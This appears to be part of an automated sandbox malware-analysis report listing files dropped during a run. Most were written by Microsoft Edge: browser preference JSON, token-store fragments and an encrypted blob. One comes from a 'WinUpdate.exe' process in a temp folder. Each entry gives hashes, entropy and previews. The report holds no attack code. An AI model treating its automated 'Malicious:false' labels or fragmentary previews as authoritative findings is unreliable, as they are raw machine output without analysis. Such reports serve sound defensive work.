                                                                                                                                                                                                                                                                                              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):460992
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                              MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                              SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                              SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                              SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                              MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                              SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                              SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                              SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:uriCache_
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.016266671904268
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXMq5n:YWLSGTt1o9LuLgfGBPAzkVj/T8lJ5n
                                                                                                                                                                                                                                                                                              MD5:D97F3D30AD66161ADCD514EE26D88B29
                                                                                                                                                                                                                                                                                              SHA1:3D090E963F3A1E44382FBD346DCDA3C19FE39E4B
                                                                                                                                                                                                                                                                                              SHA-256:257F294CE4077D10A635791E87FE8F5E42E3C0A2BD21D903B78B770B9733FA73
                                                                                                                                                                                                                                                                                              SHA-512:C0A48798FCAB2FDC605C04DB8EF567AD397F7A6A2C46BED7F7D5CB1072DBB48E2F21768983264C919686F7567B18242F564314A0F24FEDD0269C1D296AB74620
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732875749719037}]}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):85
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQan:YQ3Kq9X0dMgAEiLIM
                                                                                                                                                                                                                                                                                              MD5:BC6142469CD7DADF107BE9AD87EA4753
                                                                                                                                                                                                                                                                                              SHA1:72A9AA05003FAB742B0E4DC4C5D9EDA6B9F7565C
                                                                                                                                                                                                                                                                                              SHA-256:B26DA4F8C7E283AA74386DA0229D66AF14A37986B8CA828E054FC932F68DD557
                                                                                                                                                                                                                                                                                              SHA-512:47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45000
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.095056079934498
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWaci1zNt0Wiy3N0rfizFmPaDKJDSgzMMd6qD47u3+7:+/Ps+wsI7yO4W93zKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                              MD5:AE7F306CF27BD9502188622484672D6F
                                                                                                                                                                                                                                                                                              SHA1:050DA7D7A9639183D6C3C2A6684F3609705AF25A
                                                                                                                                                                                                                                                                                              SHA-256:20B50284F597CE4C2F16E52BF4706A96183E85E21C5FD0973E06002BBD14FF07
                                                                                                                                                                                                                                                                                              SHA-512:EF29264454E03D8B23F81698B40F0CD1963928AD06900F29BAAEE92FE2886B421D1AD174024EA520015DA1AE5B67CBA76C6C9FA68DF8F068C78C11FCCCD59CC3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):46041
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.086331694199865
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:EMkbJrT8IeQc5dKwWni1zNt0Wiy3N0rfizFmPaD4H8Du3CiokJDSgzMMd6qD47uM:EMk1rT8H1KzW93ziCiFoktSmd6qE7V
                                                                                                                                                                                                                                                                                              MD5:1200DB1A6E9CC6D95AE9C6FE87505074
                                                                                                                                                                                                                                                                                              SHA1:E292567894760011D9BBD78B20E98C689343C270
                                                                                                                                                                                                                                                                                              SHA-256:A59769273298D6BB2CF5FD5736CA8F0316F139870707B58609F1BDBA8D3E3F2D
                                                                                                                                                                                                                                                                                              SHA-512:0EF65ACC18C5FFEC2E71D8594568E88DB5DC1F9F8994FC0D6997629E88419F826C24CAB24253C1D4221F31F552C33EC80B85B4D0312354ACD0EFAC4E0E05D93E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377248544846014","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"1799c692-afe4-4c0d-a87f-678fef28dcf6"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089798259849712
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWTdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynRlkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                              MD5:3DA6C4E234A5B7046199802E4261C92A
                                                                                                                                                                                                                                                                                              SHA1:66C3C40C2F39F34C714D7756B8D7BA8E09605E3E
                                                                                                                                                                                                                                                                                              SHA-256:CFC858803B9E57420DD5C810432705983C147681AC2D3389423276619443F90E
                                                                                                                                                                                                                                                                                              SHA-512:F8DC363FBEA490A611AE4E1503D8D0ED2B34FA8545146A21C593CBC2007378CC0E4AD959B4989F8037BEA0ACF7885D7515F52066D6870229A445893E25A25468
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49545
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.083484597371678
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:EMkbJrT8IeQc5dKwQni1zNt0Wiy3Ny9FgWizFmPa84H8Du3CiokJDSgzMMd6qD4J:EMk1rT8H1K5W93GiCiFoktSmd6qE7V
                                                                                                                                                                                                                                                                                              MD5:A9D42B89E8B4363D91703E4CD23BBB56
                                                                                                                                                                                                                                                                                              SHA1:F99CD1B39186ED32934A1537E2D42B2E000BD6BA
                                                                                                                                                                                                                                                                                              SHA-256:88E23AEEB4B9BFC6F924E63FA82EED66512FC46FB2C11C248C014C2F33285F2F
                                                                                                                                                                                                                                                                                              SHA-512:E82E642DD44928ADB9F3D19819E0677D82ECFEABAEBE75E2296CE2A1A583D2484330C980EA671A00285AC9F9EB44AEA066F16FA9198ACF2C4D823784B37ECFC0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377248544846014","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"1799c692-afe4-4c0d-a87f-678fef28dcf6"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2278
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8577737801139174
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxrgxzxl9Il8uA0ptOE02Bl9/1N//n+V7CG7ATEd1rc:miYS0pt6gl3NXy+6u
                                                                                                                                                                                                                                                                                              MD5:10A183C22AC7456EC583244084E4F72B
                                                                                                                                                                                                                                                                                              SHA1:5AFBB3AD96862D285E9B0716FC7C5FC9B208534E
                                                                                                                                                                                                                                                                                              SHA-256:A2F492C8A5B6F49CE17844D0936CF891732AF6DF0C55F62304A0FED6B11D4D37
                                                                                                                                                                                                                                                                                              SHA-512:0E488357C9774CB0AE4B36AF925B74882ECEF48A4919640E1438247F0B91B1B01B486661FC4939D30DB37DBAD4424D7C2C54F4DAA6959389F654A0632210E2FF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.B.K.G.R.2.Z.B.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.x.O.k.o.W.5.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4622
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.994567222648089
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:RYbVCLE0MAMj/+JiyPKlzKAhQ2YPrXJdY0:R8VCjMAMj4iMOzK6Yrjp
                                                                                                                                                                                                                                                                                              MD5:EEAD83EA10854370CF1CA5BC0E17E056
                                                                                                                                                                                                                                                                                              SHA1:9ED37AAD04188DD655F9E51A5A19F50BDF8CBA58
                                                                                                                                                                                                                                                                                              SHA-256:4FA0122941155F772458A800F1576DCA4DDB80A2C14B44AC7A3FB3AD0BD33401
                                                                                                                                                                                                                                                                                              SHA-512:7C320A23D2EDEC65DBBE82C49F1033B67023DC214D1B9249240108E58E0E5AC9245D6F1CB4AD4EF584FE5E89E231584B551F1C26D7FD6486A17EA67866F494FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".H.o.2.S.L.V.5.B.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.x.O.k.o.W.5.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2684
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9090637155011634
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xvuxl9Il8uPOJoiRkpDRb9qb4xb3Ef8iY/HrANi/mUrd/vc:a9KYpOJoiepDdaMzEN2Hsk/mz
                                                                                                                                                                                                                                                                                              MD5:39DF56C924FC1BA9364561C732C48232
                                                                                                                                                                                                                                                                                              SHA1:8DD22228583AA7DC897B873230ABBA662CF94067
                                                                                                                                                                                                                                                                                              SHA-256:B54D6F340A6A7F909089C60E88C967F55AEA4CBF64E7B68088FDC5C64AE6754E
                                                                                                                                                                                                                                                                                              SHA-512:CD406DFA2F9BF0E1C219657EEC1DE902BCA2CE488D25D036412A1E632F3439C8F6211FCCB2980A491AF784B79F9BF526F2B8877586B748AB082DC2C6869CF6DC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.n.o.Y.X.S.9.g.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.x.O.k.o.W.5.
                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):963
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.014904284428935
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                                                                                              MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                                                                                                                                                                                                                              SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                                                                                                                                                                                                                              SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                                                                                                                                                                                                                              SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                                                                                                                                                                                                                              Malicious:false
